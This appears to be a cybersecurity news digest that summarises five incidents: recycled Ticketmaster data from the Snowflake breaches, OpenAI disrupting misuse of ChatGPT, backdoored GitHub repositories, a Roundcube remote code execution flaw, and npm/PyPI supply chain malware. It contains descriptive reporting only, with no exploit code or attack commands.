Extortion Group Briefly Resells Old Ticketmaster Data Stolen in 2024 Snowflake Attacks
OpenAI Shuts Down 10 Malicious Operations Using ChatGPT for Cyber Attacks and Disinformation
Single Threat Actor Behind 100+ Backdoored GitHub Repositories Targeting Cybercriminals
Over 84,000 Roundcube Webmail Instances Exposed to Critical Remote Code Execution Flaw
Massive Supply Chain Attack Targets npm and PyPI Ecosystems, Affecting Nearly One Million Weekly Downloads
Extortion Group Briefly Resells Old Ticketmaster Data Stolen in 2024 Snowflake Attacks
The Arkana Security extortion gang caused a brief stir over the weekend when they advertised what appeared to be newly stolen Ticketmaster data for sale, but cybersecurity investigators have determined the 569 GB of data being offered is actually recycled from the massive 2024 Snowflake data theft attacks. The group posted screenshots of the allegedly stolen information on social media, leading to initial speculation that Ticketmaster had suffered a new security breach.
However, analysis by BleepingComputer revealed that the files shown in Arkana's listing matched samples from the original Snowflake attacks that targeted multiple major organizations last year. A key indicator was one image caption reading "rapeflaked copy 4 quick sale 1 buyer," referencing RapeFlake, a custom reconnaissance and data exfiltration tool specifically created by the original threat actors to target Snowflake databases. This connection strongly suggests Arkana was attempting to resell previously stolen data rather than offering fresh breach material.
The original Snowflake attacks, claimed by the extortion group ShinyHunters, compromised numerous high-profile organizations including Santander, AT&T, Advance Auto Parts, Neiman Marcus, and Ticketmaster through stolen credentials obtained via infostealers. Ticketmaster became one of the most extensively extorted victims, with threat actors stealing personal and ticketing information before escalating their demands by releasing alleged print-at-home tickets and purported Taylor Swift concert tickets on hacking forums.
The Arkana listing has since been removed from their data leak site as of June 9, though it remains unclear whether the group previously purchased the data, consists of former threat actors involved in the original breach, or is working in partnership with ShinyHunters.
OpenAI Shuts Down 10 Malicious Operations Using ChatGPT for Cyber Attacks and Disinformation
OpenAI has terminated accounts linked to 10 malicious campaigns that exploited ChatGPT for various nefarious activities, including fake IT worker schemes, disinformation operations, malware development, and social engineering attacks targeting organizations worldwide. The AI company's threat intelligence report reveals that nearly half of these operations likely originated from China, with additional campaigns attributed to Russian and North Korean-linked actors who leveraged the language model to enhance their cyber capabilities and reach.
Among the most notable operations were fake IT worker campaigns consistent with North Korean schemes, where threat actors used ChatGPT to craft sophisticated application materials for remote software engineering positions. These campaigns went beyond creating fake personas with fabricated employment histories, expanding to auto-generate resumes and establish recruiting networks that included operators in Africa posing as job applicants and individuals in North America running laptop farms. The activities mirror previous documented cases where North Korean operatives infiltrated US companies to generate revenue while maintaining access to corporate networks.
Russian-backed accounts were caught using ChatGPT to generate German-language disinformation content about Germany's 2025 election, distributing propaganda through Telegram channels and social media platforms with tens of thousands of followers. In a particularly sophisticated operation, a Russian-speaking individual used ChatGPT to develop Windows malware called ScopeCreep, employing careful operational security practices by using temporary email addresses and limiting each account to single conversations about incremental code improvements. The malware, designed to steal browser credentials and tokens, was distributed through a fake gaming tool repository but ultimately saw limited widespread adoption.
Chinese government-backed operators represented the largest segment of malicious activity, with accounts linked to APT5 and APT15 using ChatGPT to generate massive volumes of social media content across platforms like TikTok, Facebook, and Reddit. The content focused primarily on Taiwan, American politics, and pro-Chinese Communist Party narratives in both English and Chinese. These operators also leveraged the AI for technical support including open-source research, script development, system troubleshooting, and infrastructure setup involving VPNs, Docker containers, and reconnaissance frameworks, though OpenAI noted the assistance didn't provide capabilities beyond publicly available resources.
Single Threat Actor Behind 100+ Backdoored GitHub Repositories Targeting Cybercriminals
Sophos researchers have traced more than a hundred backdoored malware repositories on GitHub to a single Russian threat actor using the identifier "ischhfd83," who has been systematically targeting novice cybercriminals and video game cheaters seeking malicious code. The investigation began when a Sophos customer inquired about Sakura RAT, a supposedly sophisticated remote access trojan that gained attention through tech journalism and social media posts in April, only to discover it was actually a backdoored version that infected would-be attackers with additional malware.
Analysis revealed that Sakura RAT was largely copied from AsyncRAT, a widely used cybercriminal tool, but with many forms left empty to prevent proper functionality while secretly installing infostealers and other malicious software on the user's device. The backdoor was implemented through a PreBuild event in the Visual Basic project file that silently downloaded malware during compilation. This same technique was found across 111 of the 141 repositories linked to the ischhfd83 email address, with 133 repositories containing some form of backdoor functionality targeting unsuspecting users.
The malicious repositories were carefully crafted to appear legitimate, with 58 percent marketed as video game cheats and 24 percent disguised as malware projects, exploits, or attack tools. The threat actor used GitHub Actions workflows to automate thousands of commits, with some repositories registering nearly 60,000 commits in just a few months to create the illusion of active development. However, closer inspection revealed telltale signs of the deception, including repositories with few contributors who had no projects of their own, similar usernames with minor character variations, and contributors who only worked on projects within the same network.
Sophos linked this campaign to previous research by security firms including Checkmarx, Trend Micro, Kaspersky, and Check Point, characterizing it as part of a broader distribution-as-a-service operation that has been active since at least 2022. While the exact distribution methods remain unclear, previous investigations have identified Discord and YouTube as primary channels for spreading links to these malicious GitHub projects. The campaign represents a rare example of cybercriminals targeting their own community, though researchers warn that inexperienced open source enthusiasts could easily be deceived by the automated commits and professional appearance of these repositories.
Over 84,000 Roundcube Webmail Instances Exposed to Critical Remote Code Execution Flaw
https://fearsoff.org/research/roundcube
More than 84,000 Roundcube webmail installations worldwide remain vulnerable to CVE-2025-49113, a critical remote code execution flaw that affects versions spanning over a decade and has already been exploited by cybercriminals who developed working exploits shortly after the patch was released. The vulnerability, discovered by security researcher Kirill Firsov, impacts Roundcube versions 1.1.0 through 1.6.10 and was patched on June 1, 2025, but the slow adoption of security updates has left tens of thousands of instances exposed to active exploitation attempts.
The flaw stems from unsanitized input in the $_GET['_from'] parameter that enables PHP object deserialization and session corruption when session keys begin with an exclamation mark. While the vulnerability requires authentication to exploit, attackers have claimed they can obtain valid credentials through various methods including cross-site request forgery attacks, log scraping, or brute force attempts. The technical details of the vulnerability have been publicly disclosed, and hackers quickly reverse-engineered the patch to create exploits that are being sold on underground forums, significantly increasing the risk of widespread attacks.
According to The Shadowserver Foundation's internet scanning data, the 84,925 vulnerable instances are distributed globally with the highest concentrations in the United States with 19,500 vulnerable installations, followed by India with 15,500, Germany with 13,600, France with 3,600, Canada with 3,500, and the United Kingdom with 2,400. The widespread deployment of Roundcube across shared hosting providers like GoDaddy, Hostinger, and OVH, as well as in government, education, and technology sectors, amplifies the potential impact of successful exploitation attempts.
System administrators are strongly urged to immediately update to patched versions 1.6.11 or 1.5.10 to address the vulnerability. For organizations unable to upgrade immediately, security experts recommend implementing temporary mitigation measures including restricting webmail access, disabling file uploads, adding cross-site request forgery protection, blocking risky PHP functions, and monitoring for indicators of exploitation attempts. The combination of public exploit availability, widespread vulnerable installations, and the critical nature of the flaw makes this a high-priority security issue requiring immediate attention from webmail administrators worldwide.
Massive Supply Chain Attack Targets npm and PyPI Ecosystems, Affecting Nearly One Million Weekly Downloads
https://www.aikido.dev/blog/supply-chain-attack-on-react-native-aria-ecosystem
Cybersecurity researchers have uncovered a sophisticated supply chain attack targeting over a dozen packages associated with GlueStack, delivering malware to developers worldwide. The malicious code, which was introduced through modifications to the "lib/commonjs/index.js" file, grants attackers the ability to execute shell commands, capture screenshots, and upload files from infected systems. These compromised packages collectively account for nearly one million weekly downloads, representing a significant threat to the global software development community.
The attack was first detected on June 6, 2025, at 9:33 p.m. GMT, affecting seventeen different packages within the React Native Aria ecosystem. The malware bears striking similarities to a remote access trojan discovered in another compromised npm package called "rand-user-agent" last month, suggesting the same threat actors may be orchestrating multiple supply chain campaigns. The trojan includes enhanced capabilities for harvesting system information and identifying public IP addresses of infected hosts, demonstrating an evolution in the attackers' techniques.
Concurrent with this discovery, security researchers identified additional malicious packages on both npm and PyPI repositories. Two rogue npm packages masquerading as legitimate utilities were found to contain wipers capable of deleting entire application directories, while a Python package disguised as an Instagram growth tool was harvesting user credentials and distributing them across ten different bot services. The npm packages used sophisticated techniques including email-based covert communication channels and platform-specific destruction commands, while the Python malware implemented remote kill switches and Base64 encoding to evade detection.
Project maintainers have responded by revoking compromised access tokens and marking affected versions as deprecated, but the incident highlights the persistent nature of these attacks. Security experts warn that attackers maintain access to infected machines even after packages are updated, emphasizing the massive scale of potential impact. The emergence of these destructive packages represents a concerning shift from traditional financially motivated attacks toward system sabotage, marking a new chapter in supply chain security threats that could affect millions of developers and organizations worldwide.
Share this post